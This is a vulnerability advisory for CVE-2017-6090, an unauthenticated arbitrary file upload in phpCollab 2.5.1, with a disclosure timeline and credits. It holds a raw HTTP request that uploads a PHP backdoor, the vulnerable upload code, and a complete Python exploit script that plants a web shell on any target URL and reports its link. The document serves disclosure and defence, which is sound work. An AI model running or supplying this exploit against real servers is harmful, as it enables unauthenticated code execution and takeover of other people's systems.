phpCollab 2.5.1 - Arbitrary File Upload

# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)

## Description

PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.

## Arbitrary File Upload

The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.

**CVE ID**: CVE-2017-6090

**Access Vector**: remote

**Security Risk**: Critical

**Vulnerability**: CWE-434

**CVSS Base Score**: 10 (Critical)

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

### Proof of Concept

The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.

For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.

```
POST /clients/editclient.php?id=1&action=update HTTP/1.1
Host: phpCollab.lan
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
Content-Length: 252

-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Type: application/x-php

<?php phpinfo(); ?>

-----------------------------154934846911423734231554128137--
```


### Vulnerable code

The vulnerable code is found in `clients/editclient.php`, line 63.

```
$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
{
  chmod("../logos_clients/".$id.".$extension",0666);
  $tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
  connectSql("$tmpquery");
}
```


### Exploit code

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os
import sys
import requests

if __name__ == '__main__':
    if (len(sys.argv) != 4):
        print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
        sys.exit(1)

    target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
    print("[*] Trying to exploit with URL : %s..." % target)
    backdoor = {'upload': open(sys.argv[3], 'rb')}
    r = requests.post(target, files=backdoor)
    extension = os.path.splitext(sys.argv[3])[1]
    link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
    r = requests.get(link)
    if r.status_code == 200:
        print("[OK] Backdoor link : %s" % link)
    else:
        print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
```

## Solution

Update to the latest version avalaible.

## Affected versions

* Version <= 2.5.1

## Timeline (dd/mm/yyyy)

* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.

## Credits

* Nicolas SERRA, Sysdream  (n.serra -at- sysdream -dot- com)

--
SYSDREAM Labs <[email protected]> 
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
* Website: https://sysdream.com/ 
* Twitter: @sysdream